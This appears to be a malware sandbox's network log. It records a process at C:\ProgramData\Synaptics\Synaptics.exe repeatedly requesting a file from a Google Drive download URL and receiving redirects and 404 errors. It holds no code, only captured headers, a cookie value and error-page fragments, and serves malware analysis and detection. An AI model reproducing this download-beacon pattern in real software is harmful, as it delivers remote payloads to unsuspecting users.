Content-Security-Policy: script-src 'report-sample' 'nonce-0HehSy6EwOHj1uW2O4VODg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49832 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:56 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-25 08:07:57 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 25 Dec 2024 08:07:57 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: script-src 'report-sample' 'nonce-wKHkHncKrXVuy69UxIbRFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                25 | 192.168.2.4 | 49852 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:00 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:01 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:01 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-AZZ7cu6h933vkv0kQeMUMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                26 | 192.168.2.4 | 49851 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:00 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:01 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:01 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-L6drlEYQUO5bHMHxD5i_SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                27 | 192.168.2.4 | 49870 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:04 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:05 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:05 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-_IdC4sBiiZiaj5N3hGWr3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                28 | 192.168.2.4 | 49871 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:04 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:05 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:05 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-DOvgeX4v9yzYqpWvQ-RZIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                29 | 192.168.2.4 | 49880 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:07 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:08 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:07 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-BB3vbpBwZBqmxM01jMah8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                                                30          192.168.2.4  49882        142.250.181.97  443               6100  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                2024-12-25 08:08:07 UTC  387                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:08 UTC  1250               IN         HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC6VFTziZmc-1Z9kBqSWv_iZRoUwfntOVECXnYRqZcaaQedZZ5fzbLyhLvQrksSI9kH0ncQcBXQ
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:07 GMT
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-tBPJd58qmnQfLVz_k7xn_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:08:08 UTC  140                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                2024-12-25 08:08:08 UTC  1390               IN         Data Ascii: 404 (Not Found)!!1</title><style nonce="X2MiLgmUQAddha56dfHNgg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                2024-12-25 08:08:08 UTC  122                IN         Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                                                31          192.168.2.4  49883        142.250.181.14  443               6100  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                2024-12-25 08:08:07 UTC  143                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:08 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:07 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-y1R7-EztHkhsLdsDW9RSZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                                                32          192.168.2.4  49881        142.250.181.97  443               6100  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                2024-12-25 08:08:07 UTC  387                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:08 UTC  1243               IN         HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC461AqJeNU0bsxLJDj9Nt4gB8pTcDSJfwIG2raq8eQslZnfZq6Mgdj1JHidaBxjrhSl
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:07 GMT
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Ys2MXjkiSQMH0IbFyxPaDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:08:08 UTC  147                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                2024-12-25 08:08:08 UTC  1390               IN         Data Ascii: t Found)!!1</title><style nonce="jxKZp6o4pzWao17pS02FSw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                2024-12-25 08:08:08 UTC  115                IN         Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                                                33          192.168.2.4  49896        142.250.181.14  443               6100  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                2024-12-25 08:08:10 UTC  143                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:11 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:10 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-VEg3NIQmKBRtVfTTO6BxOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49897 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:10 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:08:11 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:10 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-0cwDLCAWMUZ--fzZ304OIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
